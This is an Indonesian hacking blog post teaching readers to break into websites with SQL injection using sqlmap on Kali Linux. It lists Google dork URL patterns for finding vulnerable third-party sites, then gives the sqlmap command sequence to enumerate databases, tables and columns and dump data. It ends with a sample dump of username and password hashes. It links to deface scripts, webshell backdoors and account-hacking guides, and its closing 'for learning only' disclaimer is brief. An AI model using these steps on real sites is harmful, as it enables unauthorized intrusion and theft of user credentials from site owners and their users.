Cara Hack Website dengan SQL injection Kali Linux, Hacked!

Magelang1337.com - SQL Injection adalah salah satu cara hacking dimana seorang attacker bisa dengan mudah memasukkan perintah SQL lewat URL yang bisa dieksekusi oleh database. Kenapa bisa terjadi? adanya celah ini adalah variable yang kurang di filter, sehingga hacker bisa dengan mudah mendapatkan data seperti username & password dari website yang di targetkannya.

Baca juga — 7+ Cara Hack Slot Olympus Dengan APK Modlympus (Cheat).

SQLMAP sendiri adalah sebuah alat penetrasi open source untuk menguji & mengotomatisasi proses deteksi lalu bisa mengeksploitasi kelemahan SQL injection dan mengambil alih server database. Jadi setelah kita mengetahui tentang kejelasan SQLi tersebut langsung saja praktekan Cara Hack Website dengan SQL injection Kali Linux.

Hack Website dengan SQL injection Kali Linux

Daftar Isi Artikel

Hack Website dengan SQL injection Kali Linux

Langkah awal yang harus kamu lakukan yakni mencari target website yang memiliki kerentanan sql injection dengan bisa memakai dork google/bing yang kami sediakan.

Baca juga — Cara Memasang Backlink di Webshell (Backdoor), Tetap Awet!.

news_view.php?id= 
select_biblio.php?id= 
humor.php?id= 
aboutbook.php?id= 
fiche_spectacle.php?id= 
communique_detail.php?id= 
sem.php3?id= 
kategorie.php4?id= 
faq2.php?id= 
show_an.php?id= 
preview.php?id= 
loadpsb.php?id=  
opinions.php?id= 
spr.php?id= 
pages.php?id= 
announce.php?id= 
clanek.php4?id= 
participant.php?id= 
download.php?id= 
main.php?id= 
review.php?id= 
chappies.php?id= 
read.php?id= 
prod_detail.php?id= 
viewphoto.php?id= 
article.php?id= 
play_old.php?id=

Untuk mendapatkan dork yang bagus, Kamu harus membuat ide sendiri. Nah bagaimana caranya? Kami sudah membuatkan artikel yang bisa kalian baca sebagai referensi.

1. Dork Ampuh Sebagai Senjata Deface

Baca juga — 2000+ Script Deface HTML Terbaru 2023, Defacer Harus Punya!.

2. Cara Dorking Google Dengan Dorkify Termux

Baca juga — 7 Cara Hack Akun Gmail 2023, Apakah Masih Work?.

Kemudian pada terminal linux masukan perintah ini

sqlmap -u http://target.com/contoh.php?id=1 --dbs

Kamu dapat mengganti website target sesuai website yang sudah kamu dapatkan dari pencarian dork yang memiliki bug sql injection seperti diatas.

Baca juga — Cara Bypass File Restriction untuk Upload Shell Backdoor.

Selanjutnya tekan enter dan tunggu sampai sqlmap mendapat informasi database target biasanya akan memakan waktu tergantung juga dari koneksi yang kamu pakai, Sesudah itu nantinya kamu akan mendapatkan database target & langkah selanjutnya menampilkan tables database denga ketikan perintah.

sqlmap -u http://target.com/contoh.php?id=1 -D namadatabase --tables

Setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah

Baca juga — 15+ Cara Menjadi Hacker Pro Seperti "Hacker Bjorka".

sqlmap -u http://target.com/contoh.php?id=1 -D namadatabase -T namatables --columns

Tunggu sebentar sampai sqlmap tampil data columns dari tables database website tersebut setelah mendapatkan columns database, langkah terakhir kalian cuma perlu dump data columns itu dengan ketikan perintah.

sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump

Dan tunggu hingga sqlmap berhasil Dump data columns database website target setelah selesai maka kamu akan mendapatkan data web tersebut. kurang lebih seperti dibawah ini:

+--------------------------+----------------------------------+
| uname | Pass
+-------------------------+-----------------------------------+
| 210cf7aa5e2682c9c9d4511f88fe2789 | 8be3c943b1609fffbfc51aad666d0a04adf83c9d
+-------------------------+-----------------------------------+

Seperti yang sudah dijelaskan diatas, Jika ingin mendapatkan banyak website vuln. Kamu harus mencari ide dork. Share tentang Sql Injection Dengan SQLMAP Kali Linux hanya untuk pembelajaran dan mohon jangan di salahgunakan. Sekian Tutorial kali ini semoga bermanfaat.